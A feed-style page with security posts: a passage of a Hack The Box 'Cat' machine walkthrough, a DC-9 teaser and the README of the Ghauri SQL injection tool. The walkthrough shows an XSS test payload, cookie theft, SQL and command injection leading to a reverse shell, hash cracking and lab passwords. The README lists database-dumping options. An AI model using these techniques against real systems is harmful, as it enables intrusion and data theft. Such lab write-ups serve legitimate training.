  • Cross-Site Scripting (XSS): The $success_message and $error_message are output without sanitization, enabling reflected XSS attacks via crafted POST inputs (e.g., cat_name=<script>alert('XSS')</script>).
<?php if ($success_message): ?>
    <div class="message"><?php echo $success_message; ?></div>
<?php endif; ?>
<?php if ($error_message): ?>
    <div class="error-message"><?php echo $error_message; ?></div>
<?php endif; ?>
  • Weak Input Validation: The regex (/[+*{}',;<>()\\[\\]\\/\\:]/) in contains_forbidden_content is too permissive, allowing potential XSS or SQL injection bypasses.
$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
  • Insecure File Upload: The file upload trusts getimagesize and uses unsanitized basename($_FILES["cat_photo"]["name"]), risking directory traversal or malicious file uploads.
$target_file = $target_dir . $imageIdentifier . basename($_FILES["cat_photo"]["name"]);

To mitigate, sanitize outputs with htmlspecialchars(), use stricter input validation (e.g., FILTER_SANITIZE_STRING), sanitize file names, restrict upload paths, and validate file contents thoroughly.

User Registration and Login

Clicking the contest endpoint redirects to the join page, which serves as the registration page.

Let’s create a new account by completing the registration process.

The registration process was completed successfully, confirming that new user accounts can be created without errors or restrictions.

Logging in with the credentials we created was successful.

After a successful login, the contest page is displayed as shown above.

Let’s complete the form and upload a cat photo as required.

Successfully submitted the cat photo for inspection.

Exploiting XSS to Steal Admin Cookie for Cat Machine

Initialise the listener.

Injected a malicious XSS payload into the username field.

Let’s create a new account by injecting malicious XSS code into the Username field while keeping all other inputs valid.

Let’s fill out the form with normal inputs as before.

The process may take a few seconds or minutes, depending on the response time. I have attempted multiple times to ensure it works successfully.

Used Firefox Dev Tools to set the cookie and gain access to admin features

Once we obtain the token hash, we need to copy and paste it into Firefox’s inspector to proceed further.

After that, simply refresh the page, and you will notice a new β€œAdmin” option has appeared in the menu bar.

Clicking the Admin option in the menu bar redirects us to the page shown above.

Click the accept button to approve the submitted picture.

Leveraging XSS Vulnerability to Retrieve Admin Cookie for Cat Machine

Used Burp Suite to analyze POST requests.

Use Burp Suite to examine network packets for in-depth analysis.

Test the web application to determine if it is vulnerable to SQL injection attacks.

Attempting to inject the SQL command resulted in an β€œaccess denied” error, likely due to a modified or invalid cookie.

SQL Injection and Command Execution

After reconstructing the cookie, the SQL injection appears to function as anticipated.

Successfully executed command injection.

We can use the curl command to invoke the malicious file and execute it. The fact that it’s hanging is promising, indicating potential success.

It was observed that bash.sh has been transferred to the victim’s machine.

Success! A shell was obtained as the www-data user.

Database Enumeration

It’s unusual to find cat.db while searching for the database file.

Transfer the SQL file to our local machine.

We discovered that cat.db is a SQLite 3.x database.

sqlite3 cat.db opens the cat.db file using the SQLite command-line tool, allowing you to interact with the databaseβ€”run queries, view tables, and inspect its contents.

The cat.db database contains three tables: accepted_cats, cats, and users, which likely store approved cat entries, general cat data, and user information, respectively.

Immediate cracking is possible for some obtained hashes.

The screenshot shows the hashes after I rearranged them for clarity.

Breaking Password Security: Hashcat in Action

We need to specify the hash mode, which in this case could be MD5.

We successfully cracked the hash for the user Rosa, revealing the password: soyunaprincesarosa.

Boom! We successfully gained access using Rosa’s password.

The access.log file reveals the password for Axel.

The user Axel has an active shell account.

The credentials for Axel, including the password, were verified successfully.

Access is achievable via either pwncat-cs or SSH.

Executing the appropriate command retrieves the user flag.

Escalate to Root Privileges Access on Cat Machine

Privilege Escalation

The Axel user does not have sudo privileges on the cat system.

Email Analysis

We can read the message sent from Rosa to Axel.

The emails are internal updates from Rosa about two upcoming projects. In the first message, Rosa mentions that the team is working on launching new cat-related web services, including a site focused on cat care. Rosa asks Axel to send details about his Gitea project idea to Jobert, who will evaluate whether it’s worth moving forward with. Rosa also notes that the idea should be clearly explained, as she plans to review the repository herself. In the second email, Rosa shares that they’re building an employee management system. Each department admin will have a defined role, and employees will be able to view their tasks. The system is still being developed and is hosted on their private Gitea platform. Rosa includes a link to the repository and its README file, which has more information and updates. Both emails reflect early planning stages and call for team involvement and feedback.

Checking the machine’s open ports reveals that port 3000 is accessible.

Therefore, we need to set up port forwarding for port 3000.

Gitea Exploitation on Cat Machine

The service running on port 3000 is the Gitea web interface.

Using Axel’s credentials, we successfully logged in.

Gitea service is running version 1.22.0, which may contain specific features and known vulnerabilities relevant for further evaluation.

Start the Python server to serve files or host a payload for the next phase of the assessment.

Inject the XSS payload as shown above.

The fake email is sent to the user jobert to test the functionality.

Obtained a base64-encoded cookie ready for decoding.

The decoded cookie appears to contain the username admin.

Edit the file within the Gitea application.

Obtained the token as shown above.

<?php
// Hardcoded credentials committed to the repository; the same password
// turned out to grant root access on the box.
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

// Reject the request unless the client supplied matching HTTP Basic Auth
// credentials (PHP exposes them via $_SERVER['PHP_AUTH_USER'/'PHP_AUTH_PW']).
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {

    // Ask the browser to authenticate against the named realm and stop here.
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

This PHP script enforces HTTP Basic Authentication by verifying the client’s username and password against predefined valid credentials: the username “admin” and the password “IKw75eR0MR7CMIxhH0”. Upon receiving a request, the script checks for authentication headers and validates them. If the credentials are missing or incorrect, it responds with a 401 Unauthorised status and prompts the client to authenticate within the “Employee Management” realm.

The discovered password grants root access and functions as an administrator password on Windows machines.

Executing the appropriate command retrieves the root flag.

The post Hack The Box: Cat Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.

DC-9 Vulnhub Walkthrough – OSCP way

By: Jo
Recently, my focus turned more towards OSCP and I am thinking of taking the exam. After reading tons of people’s experiences over Reddit, I took some notes on what would be my way of studying for this. It isn’t easy from the looks of it and to win with time, I need a lot of […]

Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws

By: Unknown


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd into the ghauri directory.
  • Install the requirements: python3 -m pip install --upgrade -r requirements.txt
  • Run: python3 setup.py install or python3 -m pip install -e .
  • You will then be able to run Ghauri with a simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports the following types of injection payloads:
    • Boolean based
    • Error based
    • Time based
    • Stacked queries
  • Supports SQL injection for the following DBMS:
    • MySQL
    • Microsoft SQL Server
    • PostgreSQL
    • Oracle
  • Supports the following injection types:
    • GET/POST based injections
    • Header based injections
    • Cookie based injections
    • Multipart form data injections
    • JSON based injections
  • Supports a proxy option: --proxy
  • Supports parsing a request from a txt file: switch -r file.txt
  • Supports limiting data extraction for dbs/tables/columns/dump: switch --start 1 --stop 2
  • Added support for resuming all phases.
  • Added support for skipping URL encoding: switch --skip-urlencode
  • Added support for verifying extracted characters in the case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
The developer assumes no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries

